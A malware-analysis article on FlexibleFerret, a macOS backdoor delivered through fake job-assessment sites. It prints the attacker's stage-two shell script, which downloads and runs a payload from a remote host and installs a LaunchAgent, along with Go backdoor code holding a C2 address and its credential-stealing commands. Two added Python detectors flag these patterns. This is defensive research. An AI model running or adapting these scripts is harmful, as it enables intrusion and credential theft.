macOS Malware Deploys in Fake Job Scams

Cyberinchief by Cyberinchief
November 26, 2025
Reading Time: 17 mins read
Beware of fake job assessments that ask you to run Terminal commands — they could be a social engineering scheme to deploy the FlexibleFerret malware and steal your credentials. Jamf Threat Labs analyzes their latest discovery.

Author: Ferdous Saljooki

Introduction

Early in 2025, a SentinelOne blog post brought to light a malware family known as FlexibleFerret. This malware family is attributed to DPRK-aligned operators and tied to fake recruitment lures associated with the Contagious Interview operation. In this operation, individuals are led through staged hiring tasks that result in the execution of malicious instructions.

Earlier this month, Validin released a blog highlighting the details of an attack that they identified as a new variant of the Contagious Interview campaign. Jamf Threat Labs has been tracking similar activity stemming from in-the-wild detections that began with the execution of a script called /var/tmp/macpatch.sh. This script matched indicators of the previously used FlexibleFerret shell loader. Subsequent threat hunting on VirusTotal surfaced several recently uploaded JavaScript files referencing this shell script. Each of these JavaScript files had low detections, providing an opportunity to analyze the latest iteration of FlexibleFerret.

Social engineering and stage one

These JavaScript files are used on fake recruitment websites created by the attacker. One such example was evaluza[.]com. The websites are first designed to convince a user that a potential job exists for them and that they must complete a hiring assessment to be considered. A LinkedIn user publicly reported receiving a nearly identical lure, describing how they were asked to upload a video introduction and provide personal details through the same domain.

In addition to evaluza[.]com, a separate JavaScript file references proficiencycert[.]com, which hosts another recruitment-themed lure. A unique application link identified during analysis, proficiencycert[.]com/apply/o5s3x9e7i4w1mwie3h6j3ygf, presents a staged hiring assessment branded as “Blockchain Capital Operations Manager Hiring Assessment.” The JavaScript includes a broad catalog of job lures and selects a matching role and company based on the apply link to tailor the page to the intended target.

The page instructs the visitor to begin a timed assessment and lists job responsibilities, mirroring the type of professional context used to socially engineer targets.

After filling out the job assessment, applicants are then asked to record a video introduction on a fake assessment portal and then execute a provided macOS command in the Terminal, which initiates the malware on the victim’s system. This activity reflects many of the social engineering techniques used in previous Contagious Interview operations (such as that reported by researcher tayvano).

In one of the JavaScript samples analyzed by Jamf Threat Labs, the attacker attempts to persuade the victim to execute the curl command by claiming that camera or microphone access is blocked, presenting the curl command as the required fix.

The command built by the JavaScript combines several variables to produce a curl command that downloads a secondary payload to /var/tmp/macpatch.sh, marks it executable, and launches it in the background.
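The lure's Terminal line is a download-to-/var/tmp, chmod +x, run-in-background chain. The Python below is an added example (not code from the article or from Jamf) of how endpoint telemetry could flag that chain in a captured command line; both sample command lines, including the example.invalid URL, are constructed for the demonstration and are not the real lure.

```python
import re
import shlex

TEMP_DIRS = ("/var/tmp/", "/tmp/", "/private/tmp/", "/private/var/tmp/")

# Constructed samples: the first mirrors the shape of the lure command described above
# (the URL is a placeholder, not the real one); the second is an ordinary download.
LURE_SAMPLE = ("curl -s -o /var/tmp/macpatch.sh "
               "https://example.invalid/updrv8/drvMac-PLACEHOLDER.patch "
               "&& chmod +x /var/tmp/macpatch.sh && /var/tmp/macpatch.sh &")
BENIGN_SAMPLE = "curl -L -o ~/Downloads/tool.pkg https://example.invalid/tool.pkg"


def split_chain(cmdline):
    """Split a one-liner on &&, ||, ; and | into argv lists (a trailing & is dropped)."""
    line = cmdline.rstrip().rstrip("&")
    parts = re.split(r"\s*(?:&&|\|\||;|\|)\s*", line)
    return [shlex.split(p) for p in parts if p.strip()]


def analyze_oneliner(cmdline):
    """Return findings when a line downloads to a temp path, makes it executable and runs it."""
    findings, downloaded = [], set()
    for argv in split_chain(cmdline):
        prog = argv[0]
        if prog == "curl" and "-o" in argv[:-1]:
            dest = argv[argv.index("-o") + 1]
            if dest.startswith(TEMP_DIRS):
                downloaded.add(dest)
                findings.append("curl writes a payload to a temp path: " + dest)
        elif prog == "chmod" and downloaded & set(argv[1:]):
            findings.append("downloaded file marked executable")
        elif prog in downloaded or (prog in ("sh", "bash", "zsh") and downloaded & set(argv[1:])):
            findings.append("downloaded file executed in the same line")
    if findings and cmdline.rstrip().endswith("&"):
        findings.append("launched in the background (trailing &)")
    return findings


if __name__ == "__main__":
    for sample in (LURE_SAMPLE, BENIGN_SAMPLE):
        print(sample)
        print("  ->", analyze_oneliner(sample) or "no findings")
```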

Stage two

Using the URL components extracted in stage one, the second‑stage download path can be constructed:

hXXps://app.zynoracreative.com/updrv8/drvMac-as7t.patch

Retrieving this file reveals the next-stage shell script (macpatch.sh, also uploaded as cdrivMac.sh).


#!/bin/bash

ZIP_URL_ARM64_9990as7t="https://app.zynoracreative.com/updrv8/drv-Arm64.patch"
ZIP_URL_INTEL_9990as7t="https://app.zynoracreative.com/updrv8/drv-Intel.patch"
ZIP_FILE_9990as7t="/var/tmp/CDrivers.zip"                        
WORK_DIR_9990as7t="/var/tmp/CDrivers"                            
EXECUTABLE_9990as7t="drivfixer.sh"                         
APP_9990as7t="MediaPatcher.APP"                       
PLIST_FILE_9990as7t=~/Library/LaunchAgents/com.driver9990as7tpatch.plist
ACTION1_9990as7t="RunAt""Load"
ACTION2_9990as7t="KeepA""live"

# Determine CPU architecture
case $(uname -m) in
    arm64) ZIP_URL=$ZIP_URL_ARM64_9990as7t ;;
    x86_64) ZIP_URL=$ZIP_URL_INTEL_9990as7t ;;
    *) exit 1 ;;  # Exit for unsupported architectures
esac

# Create working directory
mkdir -p "$WORK_DIR_9990as7t"

# Function to clean up
cleanup() {
    rm -rf "$ZIP_FILE_9990as7t"
}

# Download, unzip, and execute
if curl -s -o "$ZIP_FILE_9990as7t" "$ZIP_URL" && [[ -f "$ZIP_FILE_9990as7t" ]]; then
    unzip -o -qq "$ZIP_FILE_9990as7t" -d "$WORK_DIR_9990as7t"
    if [[ -f "$WORK_DIR_9990as7t/$EXECUTABLE_9990as7t" ]]; then
        chmod +x "$WORK_DIR_9990as7t/$EXECUTABLE_9990as7t"
        "$WORK_DIR_9990as7t/$EXECUTABLE_9990as7t" &
    else
        cleanup
        exit 1
    fi
else
    cleanup
    exit 1
fi

# Step 4: Register the service
mkdir -p ~/Library/LaunchAgents

cat > "$PLIST_FILE_9990as7t" << EOL
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.webcam</string>
    <key>ProgramArguments</key>
    <array>
        <string>$WORK_DIR_9990as7t/$EXECUTABLE_9990as7t</string>
    </array>
    <key>${ACTION1_9990as7t}</key>
    <true/>
    <key>${ACTION2_9990as7t}</key>
    <true/>
</dict>
</plist>
EOL

chmod 644 "$PLIST_FILE_9990as7t"

if ! launchctl list | grep -q "com.webcam"; then
    launchctl load "$PLIST_FILE_9990as7t"
fi

# Step 5: Run ChromeUpdateAlert.APP_9990as7t
if [[ -d "$WORK_DIR_9990as7t/$APP_9990as7t" ]]; then
    open "$WORK_DIR_9990as7t/$APP_9990as7t" &
fi

# Final cleanup
cleanup


The script performs the following actions:

1. Determines the host architecture

The script first branches on uname -m to decide which payload to fetch:

  • arm64 hosts: hXXps://app.zynoracreative.com/updrv8/drv-Arm64.patch
  • Intel hosts: hXXps://app.zynoracreative.com/updrv8/drv-Intel.patch

2. Downloads and unpacks the stage three backdoor

The chosen archive is written to /var/tmp/CDrivers.zip and extracted into /var/tmp/CDrivers. If the expected loader (drivfixer.sh) is present, the script marks it executable and launches it in the background.

3. Establishes persistence

The script writes a LaunchAgent to ~/Library/LaunchAgents/com.driver9990as7tpatch.plist.

The plist points to the extracted loader (drivfixer.sh) inside /var/tmp/CDrivers and is intended to run at login.

4. Displays a decoy application to harvest credentials

If the extracted directory contains the ad-hoc signed application MediaPatcher.app, the script launches it.

The decoy application first shows a fake Chrome camera access prompt to establish legitimacy. It then presents a Chrome-style password prompt, captures whatever the user enters and sends it to a Dropbox account.

In this variant, the Dropbox exfiltration host is constructed by concatenating short string fragments to form content.dropboxapi.com. The malware uses Dropbox’s legitimate file upload API as its exfiltration channel for passwords, issuing an authenticated POST request to content.dropboxapi.com/2/files/upload. It also queries api.ipify.org to obtain the victim’s public IP address, consistent with earlier FlexibleFerret activity.
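The persistence described in step 3 leaves a LaunchAgent whose Label (com.webcam) does not match its filename (com.driver9990as7tpatch.plist), whose program lives under /var/tmp, and which sets both RunAtLoad and KeepAlive. The Python below is an added example (not the article's or Jamf's code) of auditing a LaunchAgents directory for those traits; the two plists it writes are constructed test data, and the benign one is invented.

```python
import os
import plistlib
import tempfile

# The stage-two script drops its loader under /var/tmp; legitimate agents rarely run from there.
SUSPICIOUS_DIRS = ("/var/tmp/", "/tmp/", "/private/tmp/", "/private/var/tmp/")

def audit_launch_agent(path):
    """Return a list of findings for one LaunchAgent plist (empty if nothing stands out)."""
    with open(path, "rb") as fh:
        plist = plistlib.load(fh)
    findings = []
    label = plist.get("Label", "")
    args = plist.get("ProgramArguments") or [plist.get("Program", "")]
    # By convention Label matches the filename; the sample writes
    # com.driver9990as7tpatch.plist but sets Label to com.webcam.
    expected = os.path.splitext(os.path.basename(path))[0]
    if label != expected:
        findings.append("label/filename mismatch: Label=%r file=%r" % (label, expected))
    if args[0].startswith(SUSPICIOUS_DIRS):
        findings.append("program runs from a temp directory: " + args[0])
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        findings.append("RunAtLoad+KeepAlive: starts at login and is restarted if it exits")
    return findings

def audit_directory(directory):
    """Audit every .plist in a LaunchAgents directory; returns {filename: findings}."""
    results = {}
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            findings = audit_launch_agent(os.path.join(directory, name))
            if findings:
                results[name] = findings
    return results

def build_sample_dir():
    """Constructed test data: one plist mirroring the FlexibleFerret agent, one benign."""
    d = tempfile.mkdtemp()
    samples = {
        "com.driver9990as7tpatch.plist": {"Label": "com.webcam", "RunAtLoad": True,
            "KeepAlive": True, "ProgramArguments": ["/var/tmp/CDrivers/drivfixer.sh"]},
        "com.example.sync.plist": {"Label": "com.example.sync", "RunAtLoad": True,
            "ProgramArguments": ["/Applications/Sync.app/Contents/MacOS/sync"]},
    }
    for name, content in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            plistlib.dump(content, fh)
    return d
```

Point audit_directory at ~/Library/LaunchAgents (expanded) to run it against a real user profile; the sample directory only exercises the three checks.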

Stage three

The third stage begins when the previously downloaded archive (/var/tmp/CDrivers.zip) is extracted, and its loader script (drivfixer.sh) is executed.

The extracted directory contains a malicious Golang project named CDrivers, which closely mirrors the structure and functionality of the backdoor previously analyzed by researcher dmpdump.

The loader script (drivfixer.sh) simply invokes the Go source file driv.go using the bundled Go runtime.

Upon execution, driv.go generates a 4‑byte random machine identifier and stores it in a .host file under the user’s temporary directory, reusing it on subsequent runs. Before proceeding, it performs delay and duplicate‑instance checks, then registers itself as the active instance. Finally, it contacts the hard‑coded C2 server at hXXp://95.169.180.140:8080 and begins the first communication loop by invoking core.StartFirst5179Iter() with the machine ID and C2 URL.


func RunDLL_5179_Main() {
    instance.Delay()
    instance.CheckDup_5179_Instance()
    instance.Register_5179_Instance()

    //url := "https://api.jz-aws.info/public/images/"
    url := "http://95.169.180."+"140:8080"
    // url := "http://127.0.0.1:8080"
    id := generate_5179_UUID()

    core.StartFirst5179Iter(id, url)
}

//export DllRegisterServer
// func DllRegisterServer() {
//  RunDLL()
// }

// main
func main() {

    RunDLL_5179_Main()
}


The backdoor’s command loop

The Go backdoor then enters a persistent command-processing loop implemented in StartFirst5179Iter. Each iteration performs the following actions:

1. Execute the current command handler

The loop invokes the handler associated with the current command type. Each handler returns:

  • msg_5179_type — the response message type to send back
  • msg_5179_data — the response payload as a set of byte slices

Supported command types are defined in the configuration file loaded by the backdoor and mapped to four-character identifiers. Some of the interesting ones are as follows:

  • qwer — collect system information (username, hostname, OS, architecture)
  • asdf — file upload: receive an archive from the C2 and extract it to disk
  • zxcv — file download: read a file or directory and return the bytes
  • vbcx — execute an OS command, either synchronously with a timeout or asynchronously in detached mode
  • r4ys — automated stealing modes
  • 89io — gather Chrome profile and extension metadata
    • 7ujm — placeholder on macOS (not implemented)
    • gi%# — enumerate Chrome Local Extension Settings directories
    • kyci — collect Chrome Login Data DB and the related keychain file for exfiltration
  • ghdj — sleep/ping
  • dghh — terminate the process

2. Wrap and send the response

The backdoor constructs the outbound message using the machine ID, message type and payload, then delivers it to the C2 using the Htxp_Exchange function.

3. Decode the next C2 command

The response from the C2 is decoded into a command identifier and a list of positional byte-slice arguments, which define what the next loop iteration will execute.

  • cmd_5179_type — command identifier
  • cmd_5179_data — arguments as positional byte slices

4. Error handling and fallback

The loop is wrapped in a recover() block. If a panic occurs during a handler, the malware resets the command type back to the system-information command (qwer) and sleeps for five minutes before continuing. This ensures that temporary failures do not break execution.

Conclusion

This campaign reinforces that FlexibleFerret remains an active threat on macOS, relying on convincing recruitment lures to move targets from a fake hiring flow into running attacker-provided commands in the Terminal that circumvent built-in protections like Gatekeeper. Our analysis links the JavaScript stagers to a familiar multi-stage attack and shows that the threat actor continues refining their social engineering to blend into legitimate-looking processes. Organizations should treat unsolicited “interview” assessments and Terminal-based “fix” instructions as high risk and ensure users know to stop and report these prompts as they continue to become more abundant in the threat landscape.

Indicators of compromise (IoCs)

Paths:
/var/tmp/macpatch.sh
/var/tmp/CDrivers
/var/tmp/CDrivers.zip
~/Library/LaunchAgents/com.driver9990as7tpatch.plist